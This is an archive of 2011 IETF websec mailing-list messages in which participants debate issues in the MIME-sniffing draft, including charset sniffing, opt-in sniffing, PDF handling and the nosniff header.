The charset sniffing is also complicated by the fact that sometimes user agents 
need to parse some of the HTML to find a  element.
In some situations, user agents need to restart the parsing algorithm, which is 
quite delicate and better to describe in the same document as HTML parsing (at 
least for use by HTML processing engines).

Adam


On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
wrote:
> 
> I tend not to agree with that.
>
> The fact that charset sniffing might happen at the same time as 
> mime-sniffing does not seem like a strong argument to include this in 
> the draft.
>
> Furthermore I would rather have these issues separate:
> First you determine the content-type and then after that you may want 
> to determine the charset used within that content-type (if you really 
> have to sniff the charset). I can also imagine that charset sniffing 
> algorithm might be depending on the application identified by the 
> sniffed mime-type, which again would speak against throwing it in together 
> with mime-sniffing
>
> Kind regards, Tobias
>
>
>
> On 24/10/11 00:55, websec issue tracker wrote:
>>
>> #22: content-type sniffing should include charset sniffing
>>
>>  the HTML5 spec contains some algorithms for sniffing charset, 
>> overriding
>>  labeled charset, etc.
>>
>>  MIME parameters like charset are as much a part of the content-type 
>> as the
>>  base internet media type, and any sniffing of parameters and other
>>  metadata (overriding content-type or guessing where it is not 
>> supplied or
>>  wrong) should be included in this document, since the sniffing will 
>> happen
>>  at the same time.
>>
>
> ___
> websec mailing list
> websec@ietf.org
> https://www.ietf.org/mailman/listinfo/websec
>
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
> First you determine the content-type and then after that you may want to 
> determine the charset used within that content-type

That's wishful thinking that doesn't match what has to happen ... the 
mime-sniffing document ALREADY is looking at the charset, by looking for 
byte-order-mark signatures to decide whether the content is text or binary.
So we're already doing charset detection, just not calling it that or 
completely specifying it.


___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #20: Sniffing should be "opt in" on a case-by-case basis

2011-10-23 Thread Larry Masinter
> Agree with this one.
> With one addition: it must be clear, that if you "opt-in" for sniffing, than 
> you MUST (SHOULD?) follow the mime-sniffing algorithm.

I don't think that's possible. I think the crux of this issue is that I don't 
think the "mime-sniffing algorithm" is currently structured in a way that lets 
the results be "opt-in" on a case-by-case basis.  


For example, the algorithm starts with an analysis of existing content-type 
headers, and winds up, in its state transition and communication paths, not 
letting later stages of the algorithm know whether the supplied content-type 
was malformed, whether there were two rather than one, etc.   So if you follow 
the algorithm, you don't have any way (at least if you're just following this 
algorithm) of "opting" later in ways that want to distinguish.  




___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #19: Do not sniff PDF

2011-10-23 Thread Larry Masinter
> - in which way is it more certain that there is no mislabeled PDF than a 
> mislabeled jpg or mislabeled rtf?

I don't think this is relevant. There is likely mislabeled PDF. But I had 
specific feedback from implementors of PDF readers that sniffing from other 
content-type resulted in a worse situation than not sniffing. I don't have any 
information on jpg or rtf.

Sniffing should only be done when it is justified by an improved user 
experience over not sniffing. 

I think the obligation of evidence is "opt in": we should only sniff content 
when there is evidence of mislabeled content for which sniffing actually 
improves something, and the improvement outweighs other considerations.

> - what about scenarios in which there is no content-type (e.g. ftp, 
> filesystem), should in this case sniffing not be done?

I didn't get any feedback on that. I don't know any workflows where valid PDF 
doesn't carry a file type label somehow (if only the file extension .pdf), so 
maybe sniffing based on file content itself doesn't matter.

((Maybe this is another issue? I just wonder if the algorithm for "no 
content-type" is the same, needs to be the same, as the algorithm for 
"content-type via HTTP".)




Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] Are all the issues filed? (was: Re: Using IETF Tracker for issues on MIME sniffing?)

2011-10-23 Thread Larry Masinter
I'd meant to do more careful write-ups of the issues I put into the tracker, 
but I've put in the main issues left over from draft-masinter-mime-sniff. 

The document also contains several sections (on sniffing fonts, for example) 
which are left as TBD. I suppose each of those is a separate "issue" to fill 
out.

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] Using IETF Tracker for issues on MIME sniffing?

2011-10-15 Thread Larry Masinter
Could we start using the IETF tracker to keep track of our conversation on the 
issues on MIME sniffing?

The interaction with a "nosniff" header should be one issue.
The other three big issues that come to mind are

*  "scope" (do what situations does this apply)
 * "opt-in case-by-case" (whether one either sniffs ALWAYS or sniffs NEVER, or 
whether it's more nuanced and based on expectation)
* "normative algorithm vs. invariants for specifications".


I'm willing to write up these issues and the sniffing ones from 
http://tools.ietf.org/html/draft-masinter-mime-web-info , and I hope we can 
capture Pete Resnick's issues as well as Alexey's.

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Tobias Gondrom
Sent: Sunday, October 02, 2011 2:44 PM
To: hal...@gmail.com
Cc: websec@ietf.org
Subject: Re: [websec] I-D Action:draft-ietf-websec-mime-sniff-03.txt
Importance: Low


Whether browser will implement it, can't tell. Maybe we can learn more when we 
progress further with the mime-sniff draft.

I don't have a strong opinion on the nosniff header.
Depending on where the mime-sniff debate will lead us, it might be a way to 
mitigate concerns that in certain cases you really SHOULD NOT or MUST NOT 
(RFC2119) sniff. Well and with such a header you could enforce exactly that for 
your sources, without breaking other unknown things/sites - which is the main 
reason for many browser vendors to start do sniffing in the first place.
(in one way nosniff could even be a migration path to less sniffing)

Best regards, Tobias



On 01/10/11 15:30, Phillip Hallam-Baker wrote:
> On Sat, Oct 1, 2011 at 2:47 AM, Adam Barth  wrote:
>> On Fri, Sep 30, 2011 at 10:14 PM, "Martin J. Dürst"
>>   wrote:
>>> On 2011/09/29 11:45, Adam Barth wrote:
 On Wed, Sep 28, 2011 at 5:44 PM, "Martin J. Dürst"
 wrote:
> On 2011/09/29 8:26, Adam Barth wrote:
>> As I recall, the nosniff directive is pretty controversial.
> But then, as I recall, the whole business of sniffing is pretty 
> controversial to start with. Are there differences between the 
> controversiality of sniffing as such and the controversiality of 
> the nosniff directive that explain why one is in the draft and the 
> other is not?
 The reason why one is in and the other isn't is just historical.
 nosniff didn't exist at the time the document was originally written.
>>> Your first answer sounded as if the nosniff directive was too 
>>> controversial to be included in any draft, but your second answer 
>>> seems to suggest that it was left out by (historical) accident, and 
>>> that it might be worth to include it.
>> The essential question isn't whether we should include it in the 
>> draft.  The essential question is whether folks want to implement it.
>> If no one wants to implement it, putting it in the draft is a 
>> negative.  If folks want to implement, then we can deal with the 
>> controversy.
> +1
>
> The controversy seems to be of the 'cut off nose to spite face'
> variety. Sniffing is definitely terrible from a security perspective 
> but people do it. Java and Java Script were terrible as well but 
> people did them and then left the rest of us with a mess that had to 
> be fixed slowly over then next ten years.
>
> Sure this is not something we should have to think about but the fact 
> is that the browsers do it and it is better for the standards to 
> describe what the browsers actually do than what people think they 
> should do.
>
>

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] Comments on mime-sniff from Jan 2010 and in internet-draft

2011-03-31 Thread Larry Masinter
On 20 January 2010, I sent comments about draft-abarth-mime-sniff-03:
http://www.ietf.org/mail-archive/web/apps-discuss/current/msg01250.html

to the "apps discuss" mailing list; there were responses, but  I disagree with 
the responses, in that I disagree that the goal of having all agents sniff 
identically is possible or even a realistic or important goal. Minimizing the 
opportunities for unnecessary privilege escalation seems like a much more 
important goal.

However, I urge the websec working group to review the comments and the 
responses.

In addition

http://tools.ietf.org/html/draft-masinter-mime-web-info

sections 3.3, 5.1.1 and 5.2 make specific comments about, and recommendations 
for, sniffing and its interactions with the MIME registry.


Larry
--
http://larry.masinter.net

From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
=JeffH
Sent: Wednesday, March 30, 2011 3:44 AM
To: IETF WebSec WG; Tobias Gondrom
Subject: [websec] slides: hodges-ietf-80-hodges-framework-reqs-Status


___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec